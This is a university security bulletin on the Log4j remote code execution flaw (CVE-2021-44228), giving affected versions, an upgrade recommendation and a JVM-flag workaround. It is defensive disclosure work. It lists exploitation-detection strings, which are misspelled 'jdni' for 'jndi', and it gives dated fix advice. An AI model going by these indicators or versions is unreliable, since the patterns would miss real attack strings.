IT Professionals:
The University Information Security Office (UISO) issued a security bulletin about a Critical Remote Code Execution Vulnerability in Log4j [1]. Log4j is widely used in many applications and may be present as an embedded dependency in many commercial or open-source products. Please see the bulletin for details on suggested steps to protect against this critical vulnerability.
Thank you for your partnership in keeping IU secure.
–IT Community Partnerships on behalf of the University Information Security Office
—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA1
The most recent version of this bulletin can be found online at the Information Security website[1].
Title
Critical Remote Code Execution Vulnerability in Log4J
Background
On December 9, 2021, a critical remote code execution vulnerability was publicly disclosed affecting multiple versions of the open-source Apache Log4j logging framework. This vulnerability has been assigned CVE-2021-44228.
Impact
Log4j is widely used in many applications and may be present as an embedded dependency in many commercial or open-source products. These may include commercial applications, locally developed applications, and cloud services. IT Pros can identify if their systems are affected by examining log files for any services utilizing Log4j. Logs containing client-controlled strings such as user-agent, URL strings, or form field submissions are potentially vulnerable. The presence of ‘jdni’ strings in log events may indicate attempts at exploitation. Examples include: ‘jdni:ldap:/’, ‘jdni:rmi:/’, ‘jdni:ldaps:/’, or ‘jdni:dns:/’. Note, this is not an exhaustive list.
Upon identification of exploitation attempts, immediately initiate incident response procedures and notify the University Information Security Office (UISO) via it-incident@iu.edu.
Platforms Affected
The vulnerability impacts Apache Log4j versions 2.0 to 2.14.1, however 1.x versions are no longer supported and may also be vulnerable. Any service or application using the log4j framework to write log data to disk may be at risk and should be evaluated.
Local Observations
The UISO has not observed local attempts to exploit this vulnerability. Internet-based attempts are ongoing.
UISO Recommendations
Upgrade to log4j-2.15.0-rc1. For commercial products, install vendor supplied updates; if no updates are available, inquire with vendor support.
Workarounds
In previous releases (versions >2.10) users can switch log4j2.formatMsgNoLookups to ‘true’. This can be done by adding the line:’-Dlog4j2.formatMsgNoLookups=True’ to the JVM command for starting the application.
Further Reading
[1] https://informationsecurity.iu.edu/security-bulletins/bulletins-2021-12-10-log4j-remote-code-execution.html
[2] https://www.zdnet.com/article/security-warning-new-zero-day-in-the-log4j-java-library-is-already-being-exploited/
[3] https://www.lunasec.io/docs/blog/log4j-zero-day/
[4] https://www.randori.com/blog/cve-2021-44228/
[5] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
[6] https://logging.apache.org/log4j/2.x/